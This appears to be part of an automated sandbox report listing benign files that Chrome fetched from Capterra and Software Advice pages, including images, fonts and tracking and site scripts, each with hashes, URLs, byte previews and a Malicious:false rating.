                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB....... .IDATx^.}k.].u.Z.q..nI-....!.F`."`g..e..!cL......)'?.I~L...L.f.Tyl'8...p.....8..`.!...z...R..}_....Z.\............}..{.....8Z....y...p.....%...,.g.g.=K8+.Y.!...s...3.7F... ......)(^g.......?y........@J...... ......s..s..H$..=a.5).,...E...! K.-....p........).,..............!....z..f.....w.@.!.$....%."XM."(@.@..Z...g:..^.W./.Rs>..^.....'V{.m.....hp.68T.._:QJ....r'.I...=.Mk.]..E...tA.....u-./h+tE..D6Br..C..V.aN.#c.0. ......n...W.....r..}...Dm hV..:...$...@.._.....^tN.%..+.....5..).&.~..R..+...B Q..t....%....t..co.....i."Y..H.Jg|.<...m.R.R....{p....n].iM..s...Y.....NJ......NYY........G..jPV..w.....+...~..A...FE.$z....X.b...$.u.......E......u...C.f...Z>...4..%..E....m..w.....1 ...l/$.Af..L.DL/.d..q. |xu..W,.rU..KI...W..yv...4...@.=....z.[{.A...Y...p....A.K.bJ`..!.HX7.Q.YK'UH......eW...RU.T@.3oh...R../........j.LAE...E... dS..4;s)34.5..2F..)( .X?'.\...s..a.;...B.d.=..*....S...j9X.=.u._<{...!P.<.[....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 246 x 76, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15225
                                                                                                                                                                                                        Entropy (8bit):7.975572338574448
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:jq7aFX2Cj9FdG+rlA2TzRl6CghpyAKiPb4svSDPk2DqTVW2T:jqcGCj9FdHlTza7pyAKiBvAMgqpW2T
                                                                                                                                                                                                        MD5:F99E405A345A0531CE5968469FF42BAE
                                                                                                                                                                                                        SHA1:4BCD8E717CFDF479145464B175BCFC998B7F6D9D
                                                                                                                                                                                                        SHA-256:340131FBAA5A1121951FD4587C0C2E01756F2B002F8232CB8ED4445CC32A8C6B
                                                                                                                                                                                                        SHA-512:6556F560516E1866A6BBA59D78A3FC3862B0E2FACE79F3FC752CA19FABBC3DBF57C372821D7FE12EA132D419A2AF4875293378BD24A6DE66779A96835FDDC2C5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......L.....^CJ.....gAMA......a....8eXIfMM.*.......i.......................................L.....#Z...:.IDATx..].`U....o.D..@.!@...p@P..* j.jQ.Z.j[k...........V..."b.+)..P...N.<....!!...._..!...H...y..{...{......Na.,K.vr...9.t&...H..P2(...I /..t.t.T...m.m.....).0..MQ.|.9.@;...v.&....@.....m'."..V.........}P=....h.r.k.vQ...........}.t...q(Y>.....Y...n...DV..H.!.EBq..s.p.....H8.OU%.P[......Z...T.....(..V..u`..=.\...-. V..V..m ......d..G...d...y.......P.HjB.......4h.....9...$O.GrZ*..8.......p.A.AO.^....M...(.....5`.....%.....8.*..U..e.........y....)-.$dL.%T...To....&.E..;.^N.D..)..F.yg.4h II... 3..=.Z.:...*.MQ.|.9.+.....%........YdVT.....^z...yd...K....._..y{....5...A.Dr....\J..3H......qm.>..z........W..=.6@.shV.YJ...]I:...7.6...j..P..^.s[O....;.R/...7.&.R\N.......G@... [.._5.t...4,W.u.~|.....F.?.NM..o..dU...0|.l@....[.u......^@.o.@...$CMGb.........y.,....Jq.[...y.......6.....z.._m..nX.O5.[>..8Tt6.9n..\..!u"V...y5./.....@..(..2..2....h.}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5175
                                                                                                                                                                                                        Entropy (8bit):7.954235967538473
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:mtgc+c4dyFDP4HDYuBsecWgBCYbc7+cV+noTW6DCHT5SFahlSc7yNIxigAHA+AbF:ogcCnNZKpc75HTW6DuMFahIoyNGsMhH
                                                                                                                                                                                                        MD5:958E84BC922882850E0D47DC07D665BE
                                                                                                                                                                                                        SHA1:1C49D9EB38C4160F89E9AF419F91902E5C2D466F
                                                                                                                                                                                                        SHA-256:C1455453FC0A0D689E629DC0319E06B3F91CE7522BDD747E3AF9FD5768464DB5
                                                                                                                                                                                                        SHA-512:4755C086CC00BB5C6FB0A64E247F485AF4034A92B0C6CF5F7572454A951A7DA504786BE67F8F41F00490BA25A2412B1243BABB05786A1F8E125CAFDDC657DACF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^..tU....}.7/....*8j..H@a....X.D.N.3.Z.v..U..i...e......F..q..`.U.G..A[.B.b...Er.=g...I.H..{.s..p.ke......?...}...H.&M.4i.....g.........V..jv]....hV..5.I...1.........=C.I.....@...Eb..d...P.?..DI.....a..E.......P.9..i.a.r.....n...z..s.9C.L4b......E...7.<~.:?.q..!..p..[..5..mD...`.1(.....^5..r1.Zd.Mf.......0......G...e..b.....A@J.\W:.lB.....4.T..4....6.o...W^(....()'...~~.<@. .E...;DM.x....B...?*...)F..,.Y......|....i.^.[jo.`..V@^..#...lF.....^\t...K..6_.a....Z.DA.r..^.....,..3.h.r.,5.o0..E7+..H ...;.p*...........u...]]X.lsD..pw....T..~.....}....sl_1.. ".P.o.zi.A.E.Mt|x~...C0{(..D0..B....[^.P....s...}.&.N...a...?....7mr0...]P<M..V...8..6.sD....1.&7.K........1..S.%."......p.....#I.H.u...I<. +-._[.6.;e....S..\.\7..+.>&.;m.].9...._.v..Lg}.Wq..xZ...w..)-^n.?N.....*p..Y.X..".J.....7.kJgOU...S..w.....\.hz....J..r..Y`S.......T[.u&....f./n,....:..~.......R4wk.T..#@.#r.tK.R#@..#..dH......X.. (.I.7..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (10200), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10200
                                                                                                                                                                                                        Entropy (8bit):5.298822363926731
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Vd89RblMYLp0eNNlO1SKCQe+IRSSLMXAgo8BhU91Ec:VdgblMmp0eNNlO10QcfLORBhUnEc
                                                                                                                                                                                                        MD5:DB6163BA6AEBB0C67404776DD315FCF6
                                                                                                                                                                                                        SHA1:B7F1584A42447F90671ED292248F6F15A96DC0F5
                                                                                                                                                                                                        SHA-256:BD8512819CFDB87DA855F5BBE87732053525D83CBC1F978143B8311640AF3586
                                                                                                                                                                                                        SHA-512:E8C6B275AD895EF6F5B1AEC5DE294E37A380E645B34FC0FB0F88DDE2B35B6C95D5A002752FE7A735F63039D95DC4EFC0F00C23789BE6136C0A61705C848398C6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://lead-acquisition-service.softwareadvice.com/las-form-min.js
                                                                                                                                                                                                        Preview:const originCheck=new RegExp(/.*?[\.\-](softwareadvice|gartner-digital-markets|g-dm)(\.vercel\.app|\.com)|https:\/\/lead-acquisition-service\.vercel\.app/);let originalOverflowStyle;const hasFaasExitIntentBeenShown=()=>{try{return!!Object.keys(localStorage).find(e=>e.match(/FAAS_MODAL_.*LAST_DISPLAY_TIME/))}catch(e){console.log(e.message)}},convertedOnDrift=()=>!!(window?.dataLayer&&0<window?.dataLayer?.length)&&!!window.dataLayer.find(e=>"drift_phone_capture"===e.eventName||"drift_chat_started"===e.eventName),handleMessage=e=>{"string"==typeof e?.data&&((e=JSON.parse(e?.data))?.event?.includes("close modal")&&(window.faasBlockExitIntent=!1,document?.querySelector("#las-modal")?.remove(),document.body.style.overflow=originalOverflowStyle,window.removeEventListener("message",handleMessage),window.sessionStorage.getItem("lasConversion")||window.localStorage?.getItem("exitIntentShown")||!e?.event?.includes("softwareadvice")&&!e?.event?.includes("getapp")||convertedOnDrift()||(window.launc
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                        Entropy (8bit):4.389162751096862
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YD9zAX+MX+IAwWEkyX+zPLhVHC:YKX+2+GWm+PS
                                                                                                                                                                                                        MD5:0F2D5408DAB4CB0361D3D52563D8CEAF
                                                                                                                                                                                                        SHA1:524824A3086A4E3A0458E5162C292F6C5E642CC2
                                                                                                                                                                                                        SHA-256:D1749FBFACD11BA7C9921EC472B830C6810A5EEFFE11E3FBEBE85350A80C47B6
                                                                                                                                                                                                        SHA-512:AFCE2E2392EA10919BB71925D31C6E660369A544C63732459D294AB86166BB9F6187FCE25028B2552767D01F9343D9F77B59439A1324236041B6D0894721ED17
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/view/publication/30080812-36e9-4257-a76c-64b9db55c4c1/1/content.json
                                                                                                                                                                                                        Preview:{"fileVersion":"1.0.0","framesData":[],"schemaVersion":"2.0.0"}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5734
                                                                                                                                                                                                        Entropy (8bit):7.384809194274161
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jj5N26MT0D5MdtbZPAVwzVJkI9BLCgtpF2pOIMYlKNvmPRUkFf:+73oYNMtKwXk4vF5nYlKNvmPRUyf
                                                                                                                                                                                                        MD5:91503E4EAB7DEE16D2BA81945917E0C5
                                                                                                                                                                                                        SHA1:38A8936B4D800201C42EA56FF400E22EEC3FE837
                                                                                                                                                                                                        SHA-256:EB400CB4AD438D3A01F0840A230734D1C1B02444E1B60D2895E51AC2AD521B24
                                                                                                                                                                                                        SHA-512:E7C9CB151FA7951B3E6CB8994DFAA7543C171680D99BD204480E92F4181F96E9E3EEF0EC2D17D6EE25F1E1CF2E3764EFAAD922B400B84DE5D3A3A0A16FF4FAF4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/b0bf7e60-e572-4090-8dd8-0e950b0ad16d.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...o....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):154163
                                                                                                                                                                                                        Entropy (8bit):5.3389309227844475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:99Q6OWJQiucWeAtoo/GuK0lHLa4Vmuaaer64fL/KkHS3eS3NHuxlHgu898d:99Q6OWJY7oo/GuK0tLamHuYu8Q
                                                                                                                                                                                                        MD5:C26F2C55E7E2055DAB5AFB6D04E2CD62
                                                                                                                                                                                                        SHA1:D7958BD655F4812E91A9A3F5F9667475BBF5FCC3
                                                                                                                                                                                                        SHA-256:F184F84EA89EF161D4E3752DD0DFC06153D79EED5ABA29895AB1251F0AD64019
                                                                                                                                                                                                        SHA-512:F32DEA52658BA038CDEDA266FC7E6FCC6509939912B382D4EFBB8C79DE0721A4A997504CD0F8A425EF3708A5732603DCE3D56F024E1AB2C34D6996C6EB7F87E2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/app/(spotlight)/p/%5BseoId%5D/%5Bslug%5D/page-e972e21d864f89f0.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6956],{74176:function(e,t,l){Promise.resolve().then(l.bind(l,245)),Promise.resolve().then(l.bind(l,8031)),Promise.resolve().then(l.bind(l,79034)),Promise.resolve().then(l.bind(l,39038)),Promise.resolve().then(l.bind(l,36141)),Promise.resolve().then(l.bind(l,79899)),Promise.resolve().then(l.bind(l,88984)),Promise.resolve().then(l.bind(l,27752)),Promise.resolve().then(l.bind(l,62725)),Promise.resolve().then(l.bind(l,36983)),Promise.resolve().then(l.bind(l,7663)),Promise.resolve().then(l.bind(l,64993)),Promise.resolve().then(l.bind(l,77073)),Promise.resolve().then(l.bind(l,97341)),Promise.resolve().then(l.bind(l,10857)),Promise.resolve().then(l.bind(l,37118)),Promise.resolve().then(l.bind(l,91886)),Promise.resolve().then(l.bind(l,20300)),Promise.resolve().then(l.bind(l,35350)),Promise.resolve().then(l.bind(l,78228)),Promise.resolve().then(l.bind(l,13691)),Promise.resolve().then(l.bind(l,79930)),Promise.resolve().then(l.bind(l,95741)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12514)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):324586
                                                                                                                                                                                                        Entropy (8bit):5.598506649028242
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:aR4McSAdB6si3i6yl6j4zCl0ztNAJ01DaOJfjU7iMeb:aqMzAv6sgi6UCY+n6
                                                                                                                                                                                                        MD5:C9A43E225E19FC924C0E5494B7AD8FD4
                                                                                                                                                                                                        SHA1:CA6A72A07B70816DCE01E312A9360CDA066D2D28
                                                                                                                                                                                                        SHA-256:DCE3E133407F70D096C500B2C829A2A72F154327B50395CC0C53F29921E40FE0
                                                                                                                                                                                                        SHA-512:7C1896880A9280FA6B33B7E27503B0AC30D77F40B7BB23EE2FA5FCE396ECEAE05E9D5FE033EBD76EFD2F8350C534849F53EACD753C1BCAF16EC7EFB259278041
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-8ML5ENYGMT&l=dataLayer&cx=c
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":27,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7874), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7874
                                                                                                                                                                                                        Entropy (8bit):5.764101088364307
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:vch2sHEwUuNyNDie4/S7YmP3RIUgRlx3Dc4PA:va2sH3UuNyNDie4/WvPOnRlxzFA
                                                                                                                                                                                                        MD5:A813184B3802F5101D09411C5F4745AC
                                                                                                                                                                                                        SHA1:CD5F0B0A4E244F3FAFDAC4977B60DBF6A747BDB2
                                                                                                                                                                                                        SHA-256:5A6E1E14BD0BA0CB7BED83CD90F0BD5B5FADBEB69E5BABB3D93A9E2FF781C48E
                                                                                                                                                                                                        SHA-512:97D1579242A9D40FF87F1D2DCE9AD4A333EA5539E80D67C4B8CC1F7666E2E9B1BA06A4B32EBB1FE66CB37280416352080B4E4798164F054312DD43FBEEE95F7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/6790c32b9fc9/main.js?
                                                                                                                                                                                                        Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,g,h,i,j,k,o,s){V=b,function(c,e,U,f,C){for(U=b,f=c();!![];)try{if(C=-parseInt(U(401))/1*(-parseInt(U(409))/2)+-parseInt(U(424))/3+parseInt(U(420))/4*(parseInt(U(344))/5)+-parseInt(U(387))/6*(-parseInt(U(347))/7)+parseInt(U(349))/8+parseInt(U(370))/9*(-parseInt(U(351))/10)+parseInt(U(416))/11*(parseInt(U(386))/12),C===e)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,364300),g=this||self,h=g[V(395)],i=function(W,e,f,C){return W=V,e=String[W(396)],f={'h':function(D){return null==D?'':f.g(D,6,function(E,X){return X=b,X(334)[X(345)](E)})},'g':function(D,E,F,Y,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(Y=W,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[Y(366)];Q+=1)if(R=D[Y(345)](Q),Object[Y(353)][Y(400)][Y(364)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[Y(353)][Y(400)][Y(364)](H,S))J=S;else{if(Object[Y(353)][Y(400)][Y(364)](I,J)){if(256>J[Y(373)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[Y(376)](F(O)),O=0):P++,G++);for(T=J[Y(373)](0),
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4754
                                                                                                                                                                                                        Entropy (8bit):7.285382325544067
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0j0c5N26MT0D5MdtbZPAVwzVHlEj+br1jotaWDCN2S:+0QcoYNMtKw/EJtQd
                                                                                                                                                                                                        MD5:A6C2CCC0D52339D1D59DF30551D0AAA8
                                                                                                                                                                                                        SHA1:615214F781F49B2F388B294633316D180EB33E62
                                                                                                                                                                                                        SHA-256:E0866699215EC1128EFA05102DFA1B6FF110B64CE6B539F097A47693826C9BC9
                                                                                                                                                                                                        SHA-512:9A31E8A3164395B9CB60B2066BDC65D390BF8AAC3EE9626720A9BEEEAA5B5DCC9AE0395201092F1E967DC615344752902B5A08556F255F30E6681002FF9CA930
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...#...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):90670
                                                                                                                                                                                                        Entropy (8bit):5.567246966706038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:JbHaL6w1uJDjO+X2DZw43hR648ahUjti9gwL:JwlINgtrhUjtWN
                                                                                                                                                                                                        MD5:AC04136B91F707D7E485B6E78358C089
                                                                                                                                                                                                        SHA1:35078309A462A42D448A5C3483F8EA31229E0A56
                                                                                                                                                                                                        SHA-256:CEC5393CCA2F47625226898B5D533EF4E85B63BF727B43E20E63B7C810962EDC
                                                                                                                                                                                                        SHA-512:8632D2B97F4B38A06C1A178E267A78E8DA3C9A4A23F7F79D2A85906489108647C609700A383C9DD801B2A47CB15B1C05FCFB345D69721BEE0B40A8F85C6B9098
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[8],{"+/Je":function(e,t,n){"use strict";n.d(t,"a",function(){return r}),n.d(t,"b",function(){return a});var r=-1,a="PRE-RENDER"},"+Kbs":function(e,t,n){"use strict";var r=n("YWhp"),a=n("S0ig"),o=n("ERkP"),i=n.n(o),c=function Attachment(e){var t=e.fill,n=void 0===t?a.a.composerIconColor:t,o=e.height,c=void 0===o?16:o,s=e.width,u=void 0===s?18:s;return i.a.createElement(r.a,{className:"drift-default-icon drift-default-icon--back-arrow",width:u,height:c,viewBox:"0 0 16 18"},i.a.createElement("path",{fill:n,fillRule:"evenodd",d:"M8.078 16a.71.71 0 0 1-.513-.222.784.784 0 0 1 0-1.075l7.53-7.879c.562-.587.871-1.368.871-2.199 0-.83-.31-1.611-.87-2.197a2.883 2.883 0 0 0-4.204 0l-8.735 9.139c-.493.516-.73 1.012-.703 1.476.026.452.298.801.46.968.27.284.563.402.892.358.413-.054.888-.35 1.375-.86l6.854-7.172a.703.703 0 0 1 1.026 0 .784.784 0 0 1 0 1.074l-6.853 7.172c-.728.761-1.475 1.196-2.222 1.293-.783.102-1.509-.172-2.1-.79-.528-.553-.841-1.2
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4608
                                                                                                                                                                                                        Entropy (8bit):7.256533626652672
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jxc5N26MT0D5MdtbZPAVwzVHlweKQqetEj71GQPwXjM/d:+0NcoYNMtKw/B9wxGQPwza
                                                                                                                                                                                                        MD5:7D057FBCC3E50DB61F5457E317F174EC
                                                                                                                                                                                                        SHA1:F696BA230B4245EEAD121FBF0881C109488CA0FA
                                                                                                                                                                                                        SHA-256:457677302500AC1287E05276933C98DEB7A31C13C7A713D66813DEBEAEADCAFE
                                                                                                                                                                                                        SHA-512:E90EC990A71ADE04041C3BC16B5A5073B60317A1F724EB7383FCB4E5640F14A4089D8F16B745B4F0F16429C7D4981F5104CCEEBD30A04E0150EE48D008B9D651
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 17728, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17728
                                                                                                                                                                                                        Entropy (8bit):7.987337206626857
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:/KaOBBleprMP1pjz5XxsCKqT3+m6qmTuk52+CL:vEBlepr8Hjz5BDKqTum6XTuu2h
                                                                                                                                                                                                        MD5:9D09D1DF90538B11770EC5F593B6D792
                                                                                                                                                                                                        SHA1:6E117EEEDA54F443063BECF094332B362E19ABB8
                                                                                                                                                                                                        SHA-256:A961366B4346F6078CC2F164D2C019F63B37E2693F6FC93A995048A98B25C083
                                                                                                                                                                                                        SHA-512:C6F4F73DF5B0C9A5A2DBED0D822F99D82E82B01AA92365F17B4F15B169DC70EF6101DC694D60179039FE44AD6A7FF6C99E396EC51E6E589A4EBF0257BAE479A2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_Gwft.woff2
                                                                                                                                                                                                        Preview:wOF2......E@..........D...........................H.p.`..`..D....s.....h..M..B..6.$..v. ..$..E.r.l..c.E38..../_y6.f.......6...t...3.....l.W..,LVIDU..F...hj,W.v7.]....:.);K...LS......[y..=x..?.,...o.......=..D].2....../2..7......+<.=G....?9.....~w.8*.g.#:w...*...S./n...L.I...lS.....F....").H.R"....3'..r.ns}....W....W.H......Of.,.P=(.4p<..0...;..w...n4..4. .+.P!.sI_.7L..U.....6FnT.GF....&...P.'JJwl..C.!..)..Y.N..h...`!>.@..~..=...p..<D.C...1D.Bv.&..5.]..7.....mjma..%.Fv.;v.i.(....%......*].aB...........y.......$.2..KpWl......[b_d!mw...b0vc.?C.....66..B.`.....oJ..J....L.WwE.D......j...vc..RHw...,.@..79.p..<.u4=aE.._..EYQ...<\=.=..?..$......;.f..}....e+O............O,.T_[.=..N.r.....TcF].......CHt..[H....r......K]..<.....$...V. ""....;_@M..Mc..S.k........A.YG....2fV......D.!.....D.8M$f.-.. ....j...`. ..Z....>...L.):.W..eo.>>Dm..>..h....>%JE|..d%....k&..C...h+8.F$.CK..6%2o.&.2.....KS.Y...W....a....7k.0..+.`"-...w...].En....`.B...e....UE....,..'N....A...G@D.,E
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (57306)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):554749
                                                                                                                                                                                                        Entropy (8bit):5.458137510361775
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:QKas9+j2vYAcyspIOL2LeNoNYIHZKC6ntkc8TUDuwiTOizp5S92gixwWPXUmwg6w:Quc0Te2FJWOtcJjAJcHA
                                                                                                                                                                                                        MD5:2A80B263F83FC001C9F50162007F11BB
                                                                                                                                                                                                        SHA1:0B3E131F6AA03015A8F20EDF3D5A5CE09B168C9F
                                                                                                                                                                                                        SHA-256:EDADF8436C633EB717030BDE5D34043B725A22E49603B31458D34011515E399B
                                                                                                                                                                                                        SHA-512:A34A2417BB3D6E7C03EB89138CCF5EE257DDA47C290FD47E553D518CFC4673955E2EF4BBBE6635440C0F68C1A49F18018B1DF5B6DA1FBE14670D449AFBAF7242
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/workspace/assets/reuseMain.bundle.js?v=3
